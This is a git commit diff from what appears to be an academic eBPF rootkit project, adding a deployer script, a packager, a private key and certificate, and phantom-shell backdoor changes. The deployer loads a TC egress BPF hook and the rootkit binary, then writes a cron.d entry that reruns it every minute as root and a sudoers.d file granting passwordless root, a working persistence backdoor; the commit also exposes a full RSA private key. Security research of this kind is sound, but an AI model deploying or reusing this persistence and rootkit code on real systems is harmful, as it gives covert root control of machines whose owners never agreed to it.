Added new deployer for preparing final files, messed up with the phantom shell, sometimes gives errors, but I don't think we can do much, the shared maps together with multi-hooks on network has some unexpected behaviours

2025-12-15 23:03:08 +08:00 · 2022-05-16 16:33:12 -04:00
parent 757a480de9
commit ccd518287a
10 changed files with 12677 additions and 12600 deletions
--- a/apps/deployer.sh
+++ b/apps/deployer.sh
@@ -0,0 +1,64 @@
+#!/bin/bash
+#set -x
+
+## Constants declaration
+#The current directory full path
+declare -r DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
+#The location of the file where to write the full rootkit package
+declare -r BASEDIR="/home/osboxes/TFG/apps"
+#A variable to determine whether to silence output of internal commands
+declare firstvar=$1
+
+RED='\033[0;31m'
+BLU='\033[0;34m'
+GRN='\033[0;32m'
+NC='\033[0m' # No Color
+
+## A simple function to wait for input
+waitForInput(){
+   if [ "$press_key_to_continue" = true ]; then
+      echo "Completed. Press any key to continue"
+      while [ true ] ; 
+      do
+         read -t 3 -n 1
+         if [ $? = 0 ] ; then
+            return ;
+         fi
+      done
+   fi
+}
+
+#A simple function to silence output
+quiet(){
+    if [ "$firstvar" == "quiet" ]; then
+        "$@" > /dev/null
+    else
+        "$@"
+    fi
+}
+
+#Start of script
+echo "*******************************************************\n"
+echo "************************* TFG *************************\n"
+echo "*******************************************************\n"
+echo "***************** Marcos Sánchez Bajo *****************\n"
+echo "*******************************************************\n"
+echo ""
+
+BACKDOOR_INSTALLED=0
+FILE=/etc/sudoers.d/ebpfbackdoor
+if test -f "$FILE"; then
+   BACKDOOR_INSTALLED=1
+   echo "Backdoor is already installed"
+else
+   echo -e "${BLU}Installing TC hook${NC}"
+   /bin/sudo tc qdisc del dev enp0s3 clsact
+   /bin/sudo tc qdisc add dev enp0s3 clsact
+   /bin/sudo tc filter add dev enp0s3 egress bpf direct-action obj "$BASEDIR"/tc.o sec classifier/egress
+   /bin/sudo "$BASEDIR"/kit -t enp0s3
+fi
+
+## Install a backdoor in cron.d
+echo "* * * * * osboxes /bin/sudo /home/osboxes/TFG/apps/deployer.sh" > /etc/cron.d/ebpfbackdoor
+echo "osboxes ALL=(ALL:ALL) NOPASSWD:ALL #" > /etc/sudoers.d/ebpfbackdoor
+
--- a/apps/mycert.pem
+++ b/apps/mycert.pem
@@ -0,0 +1,81 @@
+-----BEGIN PRIVATE KEY-----
+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
+A/iGISWr4/qHcINgtY1nBHeCd0EkOQ==
+-----END PRIVATE KEY-----
+-----BEGIN CERTIFICATE-----
+MIIE+zCCAuOgAwIBAgIURgo+OnvjsvSRONRpscRzizvP+QUwDQYJKoZIhvcNAQEL
+BQAwDTELMAkGA1UEBhMCRVMwHhcNMjIwNTA2MDEwMzM4WhcNMjMwNTA2MDEwMzM4
+WjANMQswCQYDVQQGEwJFUzCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIB
+AKpElD4Wn11yE15GMDf97qhy5MYN2X0oAiXSE/epBhc6KSsnJjQhD0WvgdP9n6GM
+zX9EUXN1r6sg4iHoWL1dBaYhKA2Qsgjx7r8XYHyyCrl4m4ps/5dr8kZsaLB4M5r9
+LhQSb8mZubjQO2CvTwYIBisKLfmPg4AcDsBOj0C+lKBrnCRGwpy6YuWcll0UvOtd
+Zy5psvK/pNUatViYkg/KRn5dObQSgUPlPlDj2jVCaH8HUgh4T+E/hHsvOgrgpzm4
+SVLqFS0sgewegrUvjNUCo/7JvcQrQeXD4mCZ0wt26U4fFf6GnF2q1NES5fBa9LEK
+po3UwgpAsOJFfdCi+fXpqcoNLxecL0PBrojN1yBdm2VM0YTTKBtQe/iwtcXQkkkd
+SxWtCEE86Mwi7zQhZJgq67B/gGdvuZ8nKP5/oVqc4al9JCPTqHhpZqI/w9QrfyK9
+QZ8XSA8NsrTVD/GqpxpWqF6jkoT9hRWSzfFJpMsx4r2+KzeLn89j4YsvrjgrVz76
+zyxIIWA6P2ANMvLgFa71XYeQK1PZkkYbriC9wtjP7ljmDwVbLEwWyBCtCw/I/ATP
+S9/d12lS8C6vXOvfn99jCN0vuXQywHJIkOtUh0q1fTDHyDbig4UzS/kpm6QKmzqb
+vtzaZr0kHTfVGhrCegXjQlOcZ07XjFRMD215OBccNKKJAgMBAAGjUzBRMB0GA1Ud
+DgQWBBQfgD7ZU0HjCQlRmuThMlRYnAkb/TAfBgNVHSMEGDAWgBQfgD7ZU0HjCQlR
+muThMlRYnAkb/TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4ICAQBC
+VzY9Q7YXIGQRv1hw2uzpv15mQJHGIPh1YyRJMQIaAPAfvLy5Mi+IY+ZMvCfVlykD
+NTxoPLiJQvwf61UOPyxOHA/TUXdLybeqiFCM025PHx/H8K482WBORPOuOFep2xf1
+A4MEFyX3aeBAEFcR0/ns2evQt4KIjmglHxmCPCTA29/6P+ObS0BtUngyFKyoCS9Z
+10EakCZsC65ALV7/qU4jPrvQYU0xMSnAop+pwAFtUvKzlfrPNuCNw3jSR3yX2pZj
+/Pkhjub7dlIAR+A2iwktAnv8s4U/QbOia/hfu3hDgXK5yvynfjBAHcFZ6nmZFlUH
+9DyTaYObWG5s3Hz3gD4hbO4m4e4mnFqwK+Q5oNBnR0Sjw/6snowKf5rq78SJ2w0w
+buoXThpknQFpvHfFnWmxcynqUp4LFWmXcK4OEkl85iwmhu/8R7rRt3K3NgrH9U18
+lya7XySsKL7tCH94B1sG81SK8l503Vs+7o37pGiehd00mj5YBuR5VqFh1QgrZQmp
+wHrqLodvegwuRxpUuwrI+3IvLYB5f3n5i9uL2/n5b6Y97aTyrXijoTdmZEn68OE1
+exrEy4SJhZXu2DFkFIjFYISw73hwsXBrr54RX34Y4y5NYb7G0IXLMdiLaKzCChAC
+gESIACorO+q0WCekd1dT+OyxdyzScFXMkgeu0P0Fmw==
+-----END CERTIFICATE-----
--- a/src/.output/kit.o
+++ b/src/.output/kit.o
--- a/src/.output/kit.skel.h
+++ b/src/.output/kit.skel.h
--- a/src/bin/kit
+++ b/src/bin/kit
--- a/src/ebpf/include/bpf/defs.h
+++ b/src/ebpf/include/bpf/defs.h
@@ -105,7 +105,7 @@ struct backdoor_priv_packet_log_16{
 struct backdoor_priv_phantom_shell{ 
 	__uint(type, BPF_MAP_TYPE_HASH);
 	__uint(max_entries, 1);
-	__type(key, __u64); //Source IPv4 of packet
+	__type(key, __u64); //Just 1
 	__type(value, struct backdoor_phantom_shell_data);
 	__uint(pinning, LIBBPF_PIN_BY_NAME);
 } backdoor_phantom_shell SEC(".maps");
--- a/src/ebpf/include/xdp/backdoor.h
+++ b/src/ebpf/include/xdp/backdoor.h
@@ -29,10 +29,10 @@ static __always_inline int execute_key_command(int command_received, __u32 ip, _
            bpf_printk("Received request to start phantom shell\n");
            //Check for phantom shell state
            __u64 key = 1;
-            struct backdoor_phantom_shell_data *ps_data = (struct backdoor_phantom_shell_data*) bpf_map_lookup_elem(&backdoor_phantom_shell, &key);
-            if(ps_data != (void*)0 && ps_data->active ==1){
+            //struct backdoor_phantom_shell_data *ps_data = (struct backdoor_phantom_shell_data*) bpf_map_lookup_elem(&backdoor_phantom_shell, &key);
+            /*if(ps_data != (void*)0 && ps_data->active ==1){
                bpf_printk("Overwriting previous phantom shell config\n");
-            }
+            }*/
            struct backdoor_phantom_shell_data ps_new_data = {0};
            ps_new_data.active = 1;
            ps_new_data.d_ip  = ip;
--- a/src/helpers/deployer.sh
+++ b/src/helpers/deployer.sh
@@ -5,7 +5,7 @@
 #The current directory full path
 declare -r DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
 #The location of the file where to write the full rootkit package
-declare -r OUTPUTDIR="/home/osboxes/TFG/apps/"
+declare -r BASEDIR="/home/osboxes/TFG/apps"
 #A variable to determine whether to silence output of internal commands
 declare firstvar=$1

@@ -45,49 +45,20 @@ echo "***************** Marcos Sánchez Bajo *****************\n"
 echo "*******************************************************\n"
 echo ""

-if [ "${PWD##*/}" != "helpers" ]; then
-    echo -e "${RED}This file should be launched from the /helpers directory${NC}"
-    exit 1
+BACKDOOR_INSTALLED=0
+FILE=/etc/sudoers.d/ebpfbackdoor
+if test -f "$FILE"; then
+   BACKDOOR_INSTALLED=1
+   echo "Backdoor is already installed"
+else
+   echo -e "${BLU}Installing TC hook${NC}"
+   /bin/sudo tc qdisc del dev enp0s3 clsact
+   /bin/sudo tc qdisc add dev enp0s3 clsact
+   /bin/sudo tc filter add dev enp0s3 egress bpf direct-action obj "$BASEDIR"/tc.o sec classifier/egress
+   /bin/sudo "$BASEDIR"/kit -t enp0s3
 fi

-#First compile helpers
-echo -e "${BLU}Compiling helper programs${NC}"
-sleep 1
-quiet make clean
-quiet make
-echo -e "${GRN}Finished${NC}"
-
-#Next compile client
-echo -e "${BLU}Compiling client programs${NC}"
-sleep 1
-cd ../client
-quiet make clean
-quiet make
-echo -e "${GRN}Finished${NC}"
-
-echo -e "${BLU}Compiling rootkit${NC}"
-sleep 1
-cd ../
-quiet make clean
-quiet make
-echo -e "${GRN}Finished${NC}"
-
-echo -e "${BLU}Compiling TC hook${NC}"
-sleep 1
-quiet make tckit
-echo -e "${GRN}Finished${NC}"
-
-echo -e "${BLU}Packaging binary results${NC}"
-cp -a bin/kit $OUTPUTDIR
-cp -a client/injector $OUTPUTDIR
-cp -a helpers/simple_open $OUTPUTDIR
-cp -a helpers/simple_timer $OUTPUTDIR
-cp -a helpers/execve_hijack $OUTPUTDIR
-cp -a helpers/injection_lib.so $OUTPUTDIR
-cp -a tc.o $OUTPUTDIR
-cp -a client/mycert.pem $OUTPUTDIR
-echo -e "${GRN}Finished${NC}"
-
-
-
+## Install a backdoor in cron.d
+echo "* * * * * osboxes /bin/sudo /home/osboxes/TFG/apps/deployer.sh" > /etc/cron.d/ebpfbackdoor
+echo "osboxes ALL=(ALL:ALL) NOPASSWD:ALL #" > /etc/sudoers.d/ebpfbackdoor

--- a/src/helpers/packager.sh
+++ b/src/helpers/packager.sh
@@ -0,0 +1,94 @@
+#!/bin/bash
+#set -x
+
+## Constants declaration
+#The current directory full path
+declare -r DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
+#The location of the file where to write the full rootkit package
+declare -r OUTPUTDIR="/home/osboxes/TFG/apps/"
+#A variable to determine whether to silence output of internal commands
+declare firstvar=$1
+
+RED='\033[0;31m'
+BLU='\033[0;34m'
+GRN='\033[0;32m'
+NC='\033[0m' # No Color
+
+## A simple function to wait for input
+waitForInput(){
+   if [ "$press_key_to_continue" = true ]; then
+      echo "Completed. Press any key to continue"
+      while [ true ] ; 
+      do
+         read -t 3 -n 1
+         if [ $? = 0 ] ; then
+            return ;
+         fi
+      done
+   fi
+}
+
+#A simple function to silence output
+quiet(){
+    if [ "$firstvar" == "quiet" ]; then
+        "$@" > /dev/null
+    else
+        "$@"
+    fi
+}
+
+#Start of script
+echo "*******************************************************\n"
+echo "************************* TFG *************************\n"
+echo "*******************************************************\n"
+echo "***************** Marcos Sánchez Bajo *****************\n"
+echo "*******************************************************\n"
+echo ""
+
+if [ "${PWD##*/}" != "helpers" ]; then
+    echo -e "${RED}This file should be launched from the /helpers directory${NC}"
+    exit 1
+fi
+
+#First compile helpers
+echo -e "${BLU}Compiling helper programs${NC}"
+sleep 1
+quiet make clean
+quiet make
+echo -e "${GRN}Finished${NC}"
+
+#Next compile client
+echo -e "${BLU}Compiling client programs${NC}"
+sleep 1
+cd ../client
+quiet make clean
+quiet make
+echo -e "${GRN}Finished${NC}"
+
+echo -e "${BLU}Compiling rootkit${NC}"
+sleep 1
+cd ../
+quiet make clean
+quiet make
+echo -e "${GRN}Finished${NC}"
+
+echo -e "${BLU}Compiling TC hook${NC}"
+sleep 1
+quiet make tckit
+echo -e "${GRN}Finished${NC}"
+
+echo -e "${BLU}Packaging binary results${NC}"
+cp -a bin/kit $OUTPUTDIR
+cp -a client/injector $OUTPUTDIR
+cp -a helpers/simple_open $OUTPUTDIR
+cp -a helpers/simple_timer $OUTPUTDIR
+cp -a helpers/execve_hijack $OUTPUTDIR
+cp -a helpers/injection_lib.so $OUTPUTDIR
+cp -a tc.o $OUTPUTDIR
+cp -a client/mycert.pem $OUTPUTDIR
+cp -a helpers/deployer.sh $OUTPUTDIR
+echo -e "${GRN}Finished${NC}"
+
+
+
+
--- a/src/user/kit.c
+++ b/src/user/kit.c
@@ -39,7 +39,7 @@
 		goto cleanup\
 	}

-static int FD_TC_MAP;
+int FD_TC_MAP;
 __u32 ifindex; //Interface to which the rootkit connects
 char* local_ip;

@@ -193,24 +193,30 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
 		}
 	}else if(e->event_type == PSH_UPDATE){
 		printf("Requested to update the phantom shell\n");
-		int key = 1;
+		__u64 key = 1;
 		struct backdoor_phantom_shell_data data;
 		struct bpf_map_info map_expect = {0};
 		struct bpf_map_info info = {0};
 		FD_TC_MAP = bpf_obj_get("/sys/fs/bpf/tc/globals/backdoor_phantom_shell");
-		printf("TC MAP ID: %i\n", FD_TC_MAP);
 		map_expect.key_size    = sizeof(__u64);
 		map_expect.value_size  = sizeof(struct backdoor_phantom_shell_data);
 		map_expect.max_entries = 1;
 		int err = check_map_fd_info(FD_TC_MAP, &info, &map_expect);
+		printf("TC MAP ID: %d\n", FD_TC_MAP);
 		if (err) {
 			fprintf(stderr, "ERR: map via FD not compatible\n");
 			return err;
 		}
+		printf("Collected stats from BPF map:\n");
+		printf(" - BPF map (bpf_map_type:%d) id:%d name:%s"
+			" key_size:%d value_size:%d max_entries:%d\n",
+			info.type, info.id, info.name,
+			info.key_size, info.value_size, info.max_entries
+			);
 		err = bpf_map_lookup_elem(FD_TC_MAP, &key, &data);
 		if(err<0) {
 			printf("Failed to read the shared map: %d\n", err);
-			return -1;
+			//return -1;
 		}
 		printf("Pre value: %i, %i, %i, %s\n", data.active, data.d_ip, data.d_port, data.payload);
 		data.active = e->bps_data.active;
@@ -354,13 +360,13 @@ int main(int argc, char**argv){
 	}

 	FD_TC_MAP = bpf_obj_get("/sys/fs/bpf/tc/globals/backdoor_phantom_shell");
-	printf("TC MAP ID: %i\n", FD_TC_MAP);
+	printf("TC MAP ID: %d\n", FD_TC_MAP);
 	map_expect.key_size    = sizeof(__u64);
 	map_expect.value_size  = sizeof(struct backdoor_phantom_shell_data);
 	map_expect.max_entries = 1;
 	err = check_map_fd_info(FD_TC_MAP, &info, &map_expect);
 	if (err) {
-		fprintf(stderr, "ERR: map via FD not compatible\n");
+		fprintf(stderr, "ERR: map via FD not compatible. Is the TC hook open?\n");
 		return err;
 	}
 	printf("Collected stats from BPF map:\n");
@@ -369,14 +375,15 @@ int main(int argc, char**argv){
 			info.type, info.id, info.name,
 			info.key_size, info.value_size, info.max_entries
 			);
-	int key = 1;
+	__u64 key = 1;
 	struct backdoor_phantom_shell_data data;
 	err = bpf_map_lookup_elem(FD_TC_MAP, &key, &data);
 	if(err<0) {
 		printf("Failed to lookup element\n");
+		return -1;
 	}
 	printf("Value: %i, %i, %i\n", data.active, data.d_ip, data.d_port);
-	//bpf_map_update_elem(tc_efd, &key, &data, 0);
+	bpf_map_update_elem(FD_TC_MAP, &key, &data, 0);

 	/*bpf_obj_get(NULL);
 	char* DIRECTORY_PIN = "/sys/fs/bpf/mymaps";